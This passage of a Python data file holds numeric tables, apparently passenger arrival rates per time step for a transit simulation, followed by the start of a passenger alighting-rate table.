(12.900016144379297, 9.816861050144, 10.66169656767643, 11.248101047631351, 9.81300068360812, 4.644022835422014, 4.181117110085521, 3.5207133855075567, 5.025882451129837, 2.0572774589411664, 1.6015856537938657, 0.9466789685935577, 0.0, 13.150613802730636, 10.413468654529133, 8.007928268969328, 6.171832376823498, 10.051764902259674, 4.92899873971058, 4.181117110085521, 3.317159168158581, 4.90650034180406, 3.7493670158771177, 2.132339313535286, 0.8924419136494547, 0.0), # 118
(12.858365683722639, 9.766749433667803, 10.638539153790012, 11.217780643872292, 9.793307052983273, 4.635226620220214, 4.162765570705529, 3.512580440726085, 5.017674628187687, 2.0499591308911307, 1.5961686266765933, 0.9439128493225009, 0.0, 13.122651740421906, 10.383041342547507, 7.980843133382966, 6.149877392673391, 10.035349256375374, 4.91761261701652, 4.162765570705529, 3.310876157300153, 4.896653526491637, 3.7392602146240983, 2.1277078307580024, 0.8878863121516185, 0.0), # 119
(12.816358925895228, 9.717214721191104, 10.61541248657489, 11.187538596808764, 9.773283050494598, 4.626566008829889, 4.144639319093177, 3.5047977893829505, 5.009631638450861, 2.0427424557315677, 1.5908326255482306, 0.9411673010755515, 0.0, 13.094337208851638, 10.352840311831065, 7.954163127741153, 6.128227367194702, 10.019263276901722, 4.906716905136131, 4.144639319093177, 3.3046900063070637, 4.886641525247299, 3.729179532269589, 2.1230824973149782, 0.8833831564719186, 0.0), # 120
(12.773944958808976, 9.668179421239865, 10.592270586151553, 11.157319273304857, 9.75290056063579, 4.618018458119934, 4.126706525218187, 3.4973383413600962, 5.001730474833633, 2.035612783026304, 1.5855663342500608, 0.9384369606446594, 0.0, 13.065627796996127, 10.322806567091252, 7.927831671250303, 6.106838349078911, 10.003460949667266, 4.8962736779041345, 4.126706525218187, 3.29858461294281, 4.876450280317895, 3.719106424434953, 2.118454117230311, 0.878925401930897, 0.0), # 121
(12.731072870375797, 9.61956604234005, 10.569067472640498, 11.127067040224649, 9.732131467900551, 4.609561424959241, 4.108935359050283, 3.490175006539462, 4.993948130250281, 2.0285554623391677, 1.5803584366233656, 0.9357164648217753, 0.0, 13.036481093831679, 10.292881113039527, 7.901792183116827, 6.085666387017502, 9.987896260500563, 4.886245009155247, 4.108935359050283, 3.2925438749708866, 4.8660657339502755, 3.7090223467415506, 2.1138134945280997, 0.8745060038490956, 0.0), # 122
(12.687691748507607, 9.571297093017627, 10.54575716616221, 11.09672626443223, 9.71094765678258, 4.601172366216706, 4.091293990559188, 3.4832806948029904, 4.986261597615085, 2.021555843233986, 1.5751976165094272, 0.9330004503988493, 0.0, 13.0068546883346, 10.263004954387341, 7.875988082547136, 6.064667529701957, 9.97252319523017, 4.876592972724187, 4.091293990559188, 3.28655169015479, 4.85547382839129, 3.698908754810744, 2.109151433232442, 0.8701179175470571, 0.0), # 123
(12.643750681116316, 9.523295081798558, 10.522293686837184, 11.066241312791686, 9.689321011775569, 4.592828738761221, 4.073750589714624, 3.476628316032624, 4.97864786984232, 2.014599275274587, 1.5700725577495283, 0.9302835541678323, 0.0, 12.976706169481197, 10.233119095846153, 7.85036278874764, 6.04379782582376, 9.95729573968464, 4.8672796424456735, 4.073750589714624, 3.280591956258015, 4.844660505887784, 3.6887471042638964, 2.104458737367437, 0.8657540983453236, 0.0), # 124
(12.599198756113843, 9.475482517208812, 10.498631054785912, 11.0355565521671, 9.667223417373222, 4.584507999461682, 4.056273326486318, 3.4701907801103036, 4.971083939846263, 2.0076711080247973, 1.5649719441849508, 0.927560412920674, 0.0, 12.94599312624776, 10.203164542127412, 7.824859720924753, 6.023013324074391, 9.942167879692526, 4.858267092154425, 4.056273326486318, 3.2746485710440583, 4.833611708686611, 3.678518850722367, 2.0997262109571824, 0.8614075015644376, 0.0), # 125
(12.553985061412101, 9.427781907774351, 10.474723290128884, 11.004616349422557, 9.644626758069233, 4.5761876051869805, 4.038830370843989, 3.463940996917971, 4.963546800541195, 2.0007566910484456, 1.5598844596569765, 0.9248256634493257, 0.0, 12.91467314761061, 10.173082297942582, 7.799422298284883, 6.002270073145335, 9.92709360108239, 4.849517395685159, 4.038830370843989, 3.268705432276415, 4.822313379034616, 3.66820544980752, 2.094944658025777, 0.8570710825249411, 0.0), # 126
(12.508058684923006, 9.380115762021138, 10.450524412986589, 10.973365071422144, 9.621502918357304, 4.567845012806012, 4.021389892757366, 3.4578518763375685, 4.95601344484139, 1.993841373909359, 1.5547987880068885, 0.9220739425457369, 0.0, 12.88270382254604, 10.142813368003106, 7.773993940034442, 5.981524121728076, 9.91202688968278, 4.8409926268725965, 4.021389892757366, 3.26274643771858, 4.810751459178652, 3.6577883571407157, 2.090104882597318, 0.8527377965473764, 0.0), # 127
(12.461368714558466, 9.332406588475143, 10.425988443479525, 10.941747085029949, 9.597823782731137, 4.5594576791876715, 4.003920062196168, 3.451896328251037, 4.948460865661126, 1.986910506171365, 1.5497036130759692, 0.9192998870018588, 0.0, 12.850042740030352, 10.112298757020445, 7.748518065379845, 5.960731518514094, 9.896921731322252, 4.832654859551452, 4.003920062196168, 3.2567554851340508, 4.798911891365568, 3.6472490283433174, 2.085197688695905, 0.8484005989522859, 0.0), # 128
(12.413864238230394, 9.284576895662326, 10.401069401728181, 10.909706757110053, 9.573561235684425, 4.551003061200851, 3.9863890491301195, 3.446047262540319, 4.9408660559146815, 1.9799494373982915, 1.5445876187055003, 0.916498133609641, 0.0, 12.816647489039854, 10.08147946970605, 7.7229380935275005, 5.939848312194873, 9.881732111829363, 4.824466167556446, 3.9863890491301195, 3.250716472286322, 4.786780617842212, 3.636568919036685, 2.0802138803456365, 0.8440524450602116, 0.0), # 129
(12.365494343850713, 9.236549192108656, 10.375721307853043, 10.877188454526541, 9.548687161710866, 4.542458615714445, 3.968765023528944, 3.440277589087355, 4.933206008516334, 1.9729435171539655, 1.539439488736764, 0.9136633191610346, 0.0, 12.78247565855085, 10.050296510771378, 7.697197443683819, 5.9188305514618955, 9.866412017032667, 4.816388624722297, 3.968765023528944, 3.244613296938889, 4.774343580855433, 3.6257294848421813, 2.075144261570609, 0.8396862901916962, 0.0), # 130
(12.316208119331334, 9.188245986340096, 10.349898181974611, 10.8441365441435, 9.523173445304161, 4.533801799597346, 3.9510161553623666, 3.4345602177740875, 4.92545771638036, 1.9658780950022154, 1.5342479070110426, 0.9107900804479897, 0.0, 12.747484837539638, 10.018690884927885, 7.671239535055213, 5.897634285006645, 9.85091543276072, 4.808384304883723, 3.9510161553623666, 3.238429856855247, 4.761586722652081, 3.614712181381168, 2.0699796363949226, 0.8352950896672816, 0.0), # 131
(12.265954652584163, 9.139589786882611, 10.32355404421337, 10.810495392825016, 9.49699197095801, 4.525010069718451, 3.9331106146001082, 3.4288680584824593, 4.917598172421039, 1.9587385205068681, 1.5290015573696185, 0.9078730542624567, 0.0, 12.711632614982527, 9.986603596887022, 7.645007786848092, 5.876215561520603, 9.835196344842078, 4.800415281875443, 3.9331106146001082, 3.2321500497988938, 4.748495985479005, 3.6034984642750065, 2.0647108088426744, 0.8308717988075103, 0.0), # 132
(12.21468303152113, 9.090503102262165, 10.296642914689816, 10.776209367435175, 9.470114623166108, 4.516060882946651, 3.915016571211893, 3.4231740210944106, 4.909604369552646, 1.9515101432317519, 1.5236891236537742, 0.904906877396386, 0.0, 12.674876579855821, 9.953975651360244, 7.618445618268871, 5.854530429695254, 9.819208739105292, 4.792443629532175, 3.915016571211893, 3.2257577735333225, 4.735057311583054, 3.5920697891450595, 2.059328582937963, 0.8264093729329243, 0.0), # 133
(12.162342344054133, 9.040908441004726, 10.26911881352444, 10.741222834838059, 9.442513286422153, 4.5069316961508425, 3.896702195167445, 3.4174510154918845, 4.90145330068946, 1.9441783127406937, 1.518299289704792, 0.9018861866417278, 0.0, 12.637174321135817, 9.920748053059004, 7.5914964485239596, 5.83253493822208, 9.80290660137892, 4.784431421688638, 3.896702195167445, 3.21923692582203, 4.721256643211077, 3.5804076116126873, 2.053823762704888, 0.8219007673640661, 0.0), # 134
(12.108881678095097, 8.990728311636257, 10.24093576083773, 10.705480161897759, 9.414159845219846, 4.4975999661999175, 3.8781356564364877, 3.4116719515568206, 4.893121958745757, 1.9367283785975222, 1.5128207393639534, 0.898805618790433, 0.0, 12.59848342779883, 9.88686180669476, 7.5641036968197675, 5.810185135792565, 9.786243917491515, 4.776340732179549, 3.8781356564364877, 3.212571404428512, 4.707079922609923, 3.5684933872992537, 2.048187152167546, 0.817338937421478, 0.0), # 135
(12.05425012155593, 8.93988522268272, 10.212047776750177, 10.668925715478352, 9.385026184052883, 4.488043149962771, 3.8592851249887445, 3.4058097391711617, 4.884587336635816, 1.9291456903660635, 1.5072421564725416, 0.8956598106344515, 0.0, 12.558761488821151, 9.852257916978965, 7.536210782362707, 5.787437071098189, 9.769174673271632, 4.768133634839627, 3.8592851249887445, 3.205745107116265, 4.6925130920264415, 3.556308571826118, 2.042409555350036, 0.812716838425702, 0.0), # 136
(11.998396762348548, 8.888301682670086, 10.18240888138228, 10.631503862443932, 9.355084187414965, 4.478238704308296, 3.8401187707939393, 3.399837288216851, 4.875826427273916, 1.9214155976101461, 1.5015522248718383, 0.8924433989657341, 0.0, 12.517966093179089, 9.816877388623073, 7.507761124359191, 5.764246792830437, 9.751652854547832, 4.759772203503592, 3.8401187707939393, 3.1987419316487826, 4.6775420937074825, 3.543834620814645, 2.036481776276456, 0.8080274256972807, 0.0), # 137
(11.941270688384867, 8.835900200124316, 10.15197309485452, 10.593158969658578, 9.32430573979979, 4.4681640861053875, 3.8206047638217933, 3.393727508575828, 4.8668162235743315, 1.913523449893597, 1.4957396284031257, 0.889151020576231, 0.0, 12.476054829848946, 9.78066122633854, 7.478698142015627, 5.740570349680789, 9.733632447148663, 4.751218512006159, 3.8206047638217933, 3.1915457757895624, 4.662152869899895, 3.5310529898861933, 2.0303946189709046, 0.8032636545567561, 0.0), # 138
(11.882820987576796, 8.782603283571376, 10.120694437287398, 10.553835403986378, 9.292662725701055, 4.457796752222938, 3.800711274042032, 3.3874533101300353, 4.85753371845134, 1.9054545967802445, 1.4897930509076862, 0.8857773122578926, 0.0, 12.432985287807028, 9.743550434836816, 7.448965254538431, 5.716363790340733, 9.71506743690268, 4.742434634182049, 3.800711274042032, 3.184140537302099, 4.646331362850527, 3.517945134662127, 2.0241388874574797, 0.7984184803246707, 0.0), # 139
(11.822996747836257, 8.72833344153723, 10.088526928801404, 10.513477532291418, 9.26012702961246, 4.447114159529844, 3.780406471424378, 3.3809876027614147, 4.847955904819222, 1.8971943878339157, 1.4837011762268022, 0.8823169108026693, 0.0, 12.38871505602964, 9.70548601882936, 7.41850588113401, 5.691583163501746, 9.695911809638444, 4.733382643865981, 3.780406471424378, 3.176510113949888, 4.63006351480623, 3.5044925107638067, 2.017705385760281, 0.7934848583215663, 0.0), # 140
(11.761747057075162, 8.673013182547843, 10.055424589517022, 10.472029721437782, 9.226670536027703, 4.436093764894997, 3.7596585259385567, 3.374303296351908, 4.838059775592251, 1.8887281726184386, 1.477452688201756, 0.8787644530025115, 0.0, 12.34320172349308, 9.666408983027624, 7.38726344100878, 5.6661845178553145, 9.676119551184502, 4.724024614892672, 3.7596585259385567, 3.168638403496426, 4.613335268013851, 3.490676573812595, 2.0110849179034047, 0.7884557438679859, 0.0), # 141
(11.69902100320542, 8.616565015129181, 10.02134143955475, 10.429436338289557, 9.192265129440482, 4.424713025187291, 3.7384356075542886, 3.367373300783457, 4.827822323684707, 1.8800413006976404, 1.4710362706738296, 0.8751145756493696, 0.0, 12.296402879173653, 9.626260332143064, 7.355181353369148, 5.64012390209292, 9.655644647369414, 4.71432262109684, 3.7384356075542886, 3.160509303705208, 4.596132564720241, 3.4764787794298533, 2.0042682879109504, 0.7833240922844712, 0.0), # 142
(11.634767674138946, 8.558911447807208, 9.986231499035082, 10.385641749710825, 9.156882694344494, 4.412949397275621, 3.7167058862412983, 3.360170525938002, 4.817220542010869, 1.871119121635349, 1.4644406074843055, 0.8713619155351939, 0.0, 12.248276112047666, 9.584981070887132, 7.322203037421526, 5.6133573649060455, 9.634441084021738, 4.704238736313203, 3.7167058862412983, 3.1521067123397293, 4.578441347172247, 3.4618805832369426, 1.9972462998070164, 0.7780828588915646, 0.0), # 143
(11.56893615778766, 8.499974989107892, 9.950048788078501, 10.340590322565676, 9.12049511523344, 4.400780338028881, 3.6944375319693092, 3.3526678816974873, 4.806231423485011, 1.8619469849953916, 1.4576543824744654, 0.867501109451935, 0.0, 12.198779011091421, 9.542512203971285, 7.288271912372326, 5.585840954986173, 9.612462846970022, 4.693735034376482, 3.6944375319693092, 3.1434145271634857, 4.56024755761672, 3.446863440855226, 1.9900097576157, 0.7727249990098085, 0.0), # 144
(11.501475542063469, 8.439678147557194, 9.912747326805505, 10.294226423718191, 9.083074276601018, 4.388183304315964, 3.6715987147080456, 3.344838277943853, 4.794831961021412, 1.8525102403415963, 1.4506662794855925, 0.8635267941915434, 0.0, 12.14786916528122, 9.498794736106976, 7.253331397427962, 5.557530721024787, 9.589663922042824, 4.682773589121394, 3.6715987147080456, 3.1344166459399743, 4.541537138300509, 3.4314088079060645, 1.9825494653611013, 0.7672434679597451, 0.0), # 145
(11.432334914878291, 8.377943431681082, 9.874281135336586, 10.246494420032459, 9.044592062940927, 4.375135753005765, 3.6481576044272312, 3.336654624559041, 4.782999147534349, 1.8427942372377903, 1.4434649823589683, 0.8594336065459691, 0.0, 12.095504163593366, 9.453769672005658, 7.21732491179484, 5.52838271171337, 9.565998295068699, 4.671316474382658, 3.6481576044272312, 3.125096966432689, 4.522296031470463, 3.41549814001082, 1.9748562270673173, 0.7616312210619166, 0.0), # 146
(11.361463364144042, 8.314693350005518, 9.83460423379223, 10.19733867837256, 9.005020358746862, 4.361615140967176, 3.6240823710965873, 3.3280898314249927, 4.770709975938102, 1.8327843252478015, 1.4360391749358754, 0.855216183307163, 0.0, 12.041641595004167, 9.407378016378791, 7.180195874679377, 5.498352975743403, 9.541419951876204, 4.65932576399499, 3.6240823710965873, 3.1154393864051255, 4.502510179373431, 3.3991128927908543, 1.966920846758446, 0.7558812136368653, 0.0), # 147
(11.288809977772631, 8.24985041105647, 9.793670642292932, 10.146703565602587, 8.964331048512523, 4.347598925069094, 3.599341184685839, 3.3191168084236504, 4.757941439146947, 1.822465853935457, 1.428377541057596, 0.8508691612670749, 0.0, 11.986239048489919, 9.359560773937822, 7.141887705287981, 5.4673975618063695, 9.515882878293894, 4.646763531793111, 3.599341184685839, 3.105427803620781, 4.482165524256262, 3.38223452186753, 1.9587341284585866, 0.7499864010051337, 0.0), # 148
(11.214323843675977, 8.1833371233599, 9.751434380959186, 10.094533448586619, 8.922496016731612, 4.33306456218041, 3.573902215164709, 3.3097084654369557, 4.744670530075158, 1.8118241728645852, 1.4204687645654126, 0.8463871772176558, 0.0, 11.929254113026934, 9.310258949394212, 7.102343822827062, 5.4354725185937545, 9.489341060150316, 4.6335918516117385, 3.573902215164709, 3.09504611584315, 4.461248008365806, 3.3648444828622073, 1.950286876191837, 0.7439397384872637, 0.0), # 149
(11.137954049765991, 8.115075995441773, 9.707849469911476, 10.040772694188746, 8.879487147897825, 4.317989509170021, 3.5477336325029207, 3.29983771234685, 4.730874241637018, 1.8008446315990123, 1.412301529300607, 0.8417648679508558, 0.0, 11.870644377591507, 9.259413547459413, 7.061507646503035, 5.402533894797036, 9.461748483274036, 4.61977279728559, 3.5477336325029207, 3.084278220835729, 4.439743573948912, 3.3469242313962493, 1.9415698939822956, 0.7377341814037977, 0.0), # 150
(11.059649683954586, 8.044989535828057, 9.6628699292703, 9.985365669273047, 8.835276326504857, 4.302351222906816, 3.5208036066701984, 3.2894774590352758, 4.716529566746802, 1.789512579702568, 1.4038645191044614, 0.8369968702586252, 0.0, 11.810367431159946, 9.206965572844876, 7.019322595522306, 5.368537739107703, 9.433059133493604, 4.605268442649386, 3.5208036066701984, 3.0731080163620117, 4.417638163252429, 3.3284552230910167, 1.9325739858540603, 0.731362685075278, 0.0), # 151
(10.979359834153682, 7.973000253044715, 9.616449779156152, 9.928256740703617, 8.789835437046412, 4.286127160259694, 3.4930803076362653, 3.2786006153841747, 4.701613498318786, 1.7778133667390779, 1.3951464178182584, 0.8320778209329146, 0.0, 11.748380862708558, 9.15285603026206, 6.975732089091292, 5.333440100217232, 9.403226996637573, 4.590040861537845, 3.4930803076362653, 3.061519400185496, 4.394917718523206, 3.309418913567873, 1.9232899558312306, 0.7248182048222469, 0.0), # 152
(10.897033588275185, 7.899030655617714, 9.568543039689514, 9.86939027534453, 8.743136364016186, 4.269294778097547, 3.4645319053708437, 3.2671800912754865, 4.686103029267251, 1.7657323422723707, 1.3861359092832806, 0.8270023567656742, 0.0, 11.68464226121364, 9.097025924422415, 6.930679546416402, 5.297197026817111, 9.372206058534502, 4.574052127785681, 3.4645319053708437, 3.049496270069676, 4.371568182008093, 3.2897967584481775, 1.9137086079379029, 0.7180936959652467, 0.0), # 153
(10.81262003423102, 7.823003252073014, 9.519103730990887, 9.80871064005988, 8.695150991907875, 4.251831533289268, 3.43512656984366, 3.2551887965911552, 4.6699751525064706, 1.7532548558662742, 1.3768216773408095, 0.8217651145488547, 0.0, 11.6191092156515, 9.0394162600374, 6.884108386704048, 5.259764567598821, 9.339950305012941, 4.557264315227617, 3.43512656984366, 3.037022523778049, 4.347575495953937, 3.2695702133532945, 1.9038207461981775, 0.7111821138248196, 0.0), # 154
(10.72606825993309, 7.744840550936584, 9.468085873180756, 9.746162201713748, 8.645851205215184, 4.233714882703753, 3.404832471024433, 3.2425996412131215, 4.653206860950727, 1.7403662570846146, 1.3671924058321279, 0.8163607310744064, 0.0, 11.551739314998438, 8.97996804181847, 6.8359620291606396, 5.221098771253843, 9.306413721901453, 4.53963949769837, 3.404832471024433, 3.0240820590741087, 4.322925602607592, 3.2487207339045834, 1.8936171746361512, 0.7040764137215078, 0.0), # 155
(10.637327353293314, 7.664465060734389, 9.415443486379615, 9.68168932717022, 8.595208888431804, 4.214922283209894, 3.37361777888289, 3.2293855350233276, 4.635775147514292, 1.727051895491221, 1.357236778598518, 0.8107838431342794, 0.0, 11.48249014823076, 8.918622274477073, 6.7861838929925895, 5.181155686473662, 9.271550295028584, 4.521139749032659, 3.37361777888289, 3.0106587737213526, 4.297604444215902, 3.2272297757234076, 1.8830886972759233, 0.6967695509758537, 0.0), # 156
(10.546346402223609, 7.581799289992394, 9.361130590707957, 9.615236383293386, 8.543195926051439, 4.195431191676585, 3.3414506633887537, 3.215519387903715, 4.6176570051114485, 1.7132971206499201, 1.3469434794812618, 0.8050290875204243, 0.0, 11.411319304324769, 8.855319962724668, 6.734717397406309, 5.1398913619497595, 9.235314010222897, 4.501727143065201, 3.3414506633887537, 2.996736565483275, 4.2715979630257195, 3.205078794431129, 1.8722261181415913, 0.6892544809083996, 0.0), # 157
(10.450553324967336, 7.495248171657732, 9.302523946219415, 9.544258060733807, 8.48743569881293, 4.174003322325641, 3.3075747046495003, 3.200048222203801, 4.597442309412912, 1.698678070701901, 1.335972342259087, 0.7988866158226731, 0.0, 11.335080203181485, 8.787752774049402, 6.679861711295434, 5.096034212105701, 9.194884618825824, 4.480067511085322, 3.3075747046495003, 2.9814309445183147, 4.243717849406465, 3.1814193535779363, 1.8605047892438833, 0.6813861974234302, 0.0), # 158
(10.335201473769764, 7.395933826819331, 9.224527454803487, 9.454176016727876, 8.414178555796186, 4.143513212539135, 3.2677489343700015, 3.17754122744589, 4.566999388570334, 1.6807983479345614, 1.3223972849777657, 0.7911589610963629, 0.0, 11.235598705688274, 8.70274857205999, 6.611986424888827, 5.042395043803683, 9.133998777140668, 4.448557718424246, 3.2677489343700015, 2.9596522946708106, 4.207089277898093, 3.1513920055759597, 1.8449054909606977, 0.6723576206199392, 0.0), # 159
(10.198820932866035, 7.28304080162725, 9.125574450948537, 9.343506385929302, 8.321992122590341, 4.103212058438943, 3.221570623868649, 3.147432860557619, 4.525465106040038, 1.6594219781520132, 1.3060272186755595, 0.7817252273702489, 0.0, 11.110988852451014, 8.598977501072737, 6.530136093377798, 4.978265934456038, 9.050930212080075, 4.406406004780667, 3.221570623868649, 2.9308657560278157, 4.160996061295171, 3.114502128643102, 1.8251148901897079, 0.6620946183297501, 0.0), # 160
(10.042510876420344, 7.1573051140366015, 9.006721467228694, 9.213301128944565, 8.211833582663305, 4.053588080615757, 3.1693770122048135, 3.1101003109807053, 4.473387224599541, 1.6347303676098288, 1.2870063860732652, 0.77067287137255, 0.0, 10.962523662746737, 8.477401585098049, 6.435031930366326, 4.904191102829485, 8.946774449199083, 4.354140435372988, 3.1693770122048135, 2.8954200575826836, 4.105916791331652, 3.071100376314856, 1.801344293445739, 0.6506641012760548, 0.0), # 161
(9.8673704785969, 7.01946278200249, 8.86902503621808, 9.064612206380144, 8.08466011948299, 3.9951294996602726, 3.1115053384378664, 3.0659207681568685, 4.411313507026364, 1.6069049225635816, 1.2654790298916783, 0.7580893498314843, 0.0, 10.791476155852466, 8.338982848146326, 6.3273951494583915, 4.820714767690744, 8.822627014052728, 4.292289075419616, 3.1115053384378664, 2.8536639283287664, 4.042330059741495, 3.0215374021267154, 1.773805007243616, 0.6381329801820447, 0.0), # 162
(9.674498913559898, 6.870249823480022, 8.71354169049082, 8.898491578842531, 7.941428916517308, 3.928324536163185, 3.048292841627181, 3.015271421527823, 4.339791716098023, 1.5761270492688444, 1.2415893928515955, 0.7440621194752707, 0.0, 10.599119351045232, 8.184683314227977, 6.207946964257977, 4.728381147806532, 8.679583432196045, 4.221379990138953, 3.048292841627181, 2.8059460972594175, 3.970714458258654, 2.9661638596141775, 1.742708338098164, 0.6245681657709112, 0.0), # 163
(9.464995355473539, 6.710402256424303, 8.54132796262104, 8.71599120693821, 7.783097157234176, 3.853661410715189, 2.9800767608321266, 2.9585294605352903, 4.259369614592037, 1.5425781539811894, 1.2154817176738126, 0.7286786370321272, 0.0, 10.386726267602059, 8.015465007353399, 6.077408588369063, 4.627734461943566, 8.518739229184074, 4.141941244749407, 2.9800767608321266, 2.752615293367992, 3.891548578617088, 2.905330402312737, 1.7082655925242083, 0.6100365687658459, 0.0), # 164
(9.239958978502024, 6.5406560987904445, 8.353440385182864, 8.518163051273666, 7.610622025101502, 3.771628343906979, 2.9071943351120755, 2.8960720746209856, 4.1705949652859235, 1.5064396429561904, 1.1873002470791263, 0.7120263592302724, 0.0, 10.155569924799979, 7.832289951532995, 5.936501235395631, 4.51931892886857, 8.341189930571847, 4.05450090446938, 2.9071943351120755, 2.694020245647842, 3.805311012550751, 2.839387683757889, 1.670688077036573, 0.5946050998900405, 0.0), # 165
(9.000488956809557, 6.361747368533551, 8.150935490750417, 8.306059072455376, 7.4249607035872005, 3.682713556329251, 2.8299828035264003, 2.8282764532266285, 4.074015530957201, 1.4678929224494195, 1.157189223788332, 0.6941927427979253, 0.0, 9.906923341916015, 7.636120170777177, 5.78594611894166, 4.403678767348258, 8.148031061914402, 3.95958703451728, 2.8299828035264003, 2.630509683092322, 3.7124803517936003, 2.768686357485126, 1.6301870981500834, 0.5783406698666865, 0.0), # 166
(8.747684464560333, 6.174412083608727, 7.934869811897824, 8.080731231089835, 7.2270703761591815, 3.5874052685726983, 2.7487794051344725, 2.7555197857939366, 3.9701790743833865, 1.4271193987164503, 1.1252928905222266, 0.6752652444633036, 0.0, 9.642059538227196, 7.427917689096338, 5.626464452611132, 4.28135819614935, 7.940358148766773, 3.8577277001115116, 2.7487794051344725, 2.562432334694784, 3.6135351880795907, 2.693577077029946, 1.5869739623795647, 0.5613101894189753, 0.0), # 167
(8.482644675918554, 5.979386261971081, 7.706299881199207, 7.843231487783524, 7.017908226285359, 3.4861917012280164, 2.663921378995663, 2.6781792617646265, 3.8596333583419993, 1.3843004780128556, 1.0917554900016058, 0.6553313209546264, 0.0, 9.362251533010546, 7.20864453050089, 5.458777450008029, 4.152901434038566, 7.7192667166839986, 3.7494509664704774, 2.663921378995663, 2.490136929448583, 3.5089541131426794, 2.614410495927842, 1.5412599762398416, 0.5435805692700985, 0.0), # 168
(8.206468765048422, 5.777405921575724, 7.466282231228694, 7.594611803142927, 6.798431437433646, 3.3795610748859013, 2.5757459641693443, 2.5966320705804184, 3.7429261456105576, 1.339617566594208, 1.0567212649472661, 0.6344784290001119, 0.0, 9.0687723455431, 6.9792627190012295, 5.28360632473633, 4.018852699782624, 7.485852291221115, 3.635284898812586, 2.5757459641693443, 2.413972196347072, 3.399215718716823, 2.5315372677143095, 1.493256446245739, 0.5252187201432478, 0.0), # 169
(7.9202559061141375, 5.569207080377758, 7.215873394560408, 7.335924137774526, 6.569597193071951, 3.268001610137046, 2.4845903997148873, 2.5112554016830275, 3.620605198966578, 1.2932520707160806, 1.020334458080004, 0.6127940253279787, 0.0, 8.762894995101878, 6.740734278607764, 5.101672290400019, 3.879756212148241, 7.241210397933156, 3.5157575623562387, 2.4845903997148873, 2.3342868643836043, 3.2847985965359756, 2.4453080459248424, 1.4431746789120816, 0.5062915527616144, 0.0), # 170
(7.6251052732799005, 5.355525756332291, 6.956129903768475, 7.068220452284813, 6.3323626766681915, 3.152001527572146, 2.390791924691664, 2.4224264445141737, 3.4932182811875796, 1.2453853966340462, 0.9827393121206148, 0.5903655666664452, 0.0, 8.445892500963913, 6.494021233330896, 4.913696560603074, 3.736156189902138, 6.986436562375159, 3.3913970223198433, 2.390791924691664, 2.2514296625515327, 3.1661813383340958, 2.356073484094938, 1.391225980753695, 0.4868659778483902, 0.0), # 171
(7.322116040709912, 5.137097967394431, 6.688108291427019, 6.792552707280267, 6.087685071690277, 3.0320490477818964, 2.2946877781590462, 2.3305223885155746, 3.3613131550510804, 1.1961989506036783, 0.9440800697898953, 0.56728050974373, 0.0, 8.119037882406225, 6.24008560718103, 4.720400348949476, 3.588596851811034, 6.722626310102161, 3.2627313439218044, 2.2946877781590462, 2.165749319844212, 3.0438425358451386, 2.2641842357600894, 1.337621658285404, 0.4670089061267665, 0.0), # 172
(7.012387382568372, 4.914659731519285, 6.412865090110164, 6.509972863367375, 5.836521561606121, 2.9086323913569916, 2.196615199176405, 2.235920423128947, 3.225437583334597, 1.145874138880549, 0.9045009738086416, 0.5436263112880514, 0.0, 7.783604158705848, 5.979889424168563, 4.522504869043208, 3.437622416641646, 6.450875166669194, 3.130288592380526, 2.196615199176405, 2.077594565254994, 2.9182607808030605, 2.169990954455792, 1.282573018022033, 0.446787248319935, 0.0), # 173
(6.697018473019482, 4.6889470666619575, 6.131456832392036, 6.221532881152618, 5.579829329883635, 2.7822397788881266, 2.096911426803113, 2.1389977377960108, 3.08613932881565, 1.0945923677202316, 0.8641462668976501, 0.519490428027628, 0.0, 7.440864349139807, 5.7143947083039075, 4.32073133448825, 3.283777103160694, 6.1722786576313, 2.994596832914415, 2.096911426803113, 1.9873141277772333, 2.7899146649418176, 2.07384429371754, 1.2262913664784072, 0.42626791515108714, 0.0), # 174
(6.377108486227438, 4.460695990777558, 5.84494005084676, 5.928284721242486, 5.318565559990731, 2.653359430965997, 1.9959137000985407, 2.040131521958481, 2.943966154271756, 1.0425350433782987, 0.8231601917777163, 0.49496031669067847, 0.0, 7.092091472985131, 5.444563483597462, 4.115800958888581, 3.1276051301348957, 5.887932308543512, 2.8561841307418736, 1.9959137000985407, 1.8952567364042836, 2.6592827799953653, 1.9760949070808291, 1.1689880101693522, 0.40551781734341447, 0.0), # 175
(6.053756596356447, 4.230642521821194, 5.554371278048459, 5.631280344243462, 5.053687435395322, 2.5224795681812964, 1.8939592581220606, 1.9396989650580787, 2.7994658224804327, 0.9898835721103237, 0.781686991169637, 0.470123434005421, 0.0, 6.738558549518844, 5.17135777405963, 3.9084349558481852, 2.9696507163309707, 5.5989316449608655, 2.71557855108131, 1.8939592581220606, 1.8017711201294973, 2.526843717697661, 1.8770934480811543, 1.1108742556096918, 0.38460386562010856, 0.0), # 176
(5.7280619775707065, 3.9995226777479713, 5.260807046571258, 5.331571710762027, 4.786152139565322, 2.3900884111247205, 1.791385339933044, 1.8380772565365193, 2.6531860962191995, 0.9368193601718788, 0.7398709077942084, 0.4450672367000743, 0.0, 6.381538598017975, 4.895739603700816, 3.699354538971042, 2.8104580805156356, 5.306372192438399, 2.5733081591511273, 1.791385339933044, 1.707206007946229, 2.393076069782661, 1.7771905702540096, 1.0521614093142517, 0.3635929707043611, 0.0), # 177
(5.401123804034416, 3.7680724765129963, 4.9653038889892835, 5.030210781404673, 4.516916855968639, 2.2566741803869648, 1.6885291845908623, 1.7356435858355217, 2.505674738265573, 0.8835238138185378, 0.6978561843722264, 0.41987918150285664, 0.0, 6.022304637759553, 4.618670996531422, 3.489280921861132, 2.6505714414556127, 5.011349476531146, 2.4299010201697304, 1.6885291845908623, 1.611910128847832, 2.2584584279843196, 1.6767369271348913, 0.9930607777978567, 0.34255204331936334, 0.0), # 178
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 179
)
passenger_allighting_rate = (
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 0
